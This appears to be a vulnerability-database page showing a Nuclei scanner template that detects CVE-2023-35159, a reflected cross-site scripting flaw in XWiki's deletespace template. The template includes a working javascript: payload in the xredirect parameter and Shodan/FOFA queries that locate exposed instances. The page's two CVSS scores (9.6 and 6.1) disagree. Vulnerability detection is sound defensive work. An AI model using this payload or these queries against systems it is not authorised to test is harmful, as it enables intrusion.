Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-35159
HistoryJul 04, 2024 - 12:17 p.m.

XWiki >= 3.4-milestone-1 - Cross-Site Scripting

2024-07-0412:17:03
ProjectDiscovery
github.com
11
cve
cve2023
xwiki
cross-site scripting
deletespace
javascript injection

CVSS3

9.6

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

AI Score

6.7

Confidence

High

EPSS

0.55

Percentile

97.7%

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the deletespace template to perform a XSS, e.g. by using URL such as: > xwiki/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain).
id: CVE-2023-35159

info:
  name: XWiki >= 3.4-milestone-1 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the deletespace template to perform a XSS, e.g. by using URL such as: > xwiki/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain).
  impact: |
    Successful exploitation could lead to cross-site scripting.
  remediation: |
    This vulnerability has been patched in XWiki 14.10.5,15.1-rc-1.
  reference:
    - https://jira.xwiki.org/browse/XWIKI-20612
    - https://nvd.nist.gov/vuln/detail/CVE-2023-35159
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-35159
    cwe-id: CWE-79
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    verified: true
    vendor: xwiki
    product: xwiki
    shodan-query: html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2023,xwiki,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/xwiki/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain)"
      - "{{BaseURL}}/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain)"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'javascript:alert(document.domain)'
          - 'deletespace.Sandbox'
        condition: and

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200
          - 401
# digest: 4a0a0047304502202be07a127aa55d3394efcd2fd59ecadf7a8406b29a310e7cc7501b66790c5d86022100d893c80ab2689f44a6e10b16ea35c12232013b98598d07cdf7d4b0710c5654a4:922c64590222798bb761d5b6d8e72950

CVSS3

9.6

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

AI Score

6.7

Confidence

High

EPSS

0.55

Percentile

97.7%

Related for NUCLEI:CVE-2023-35159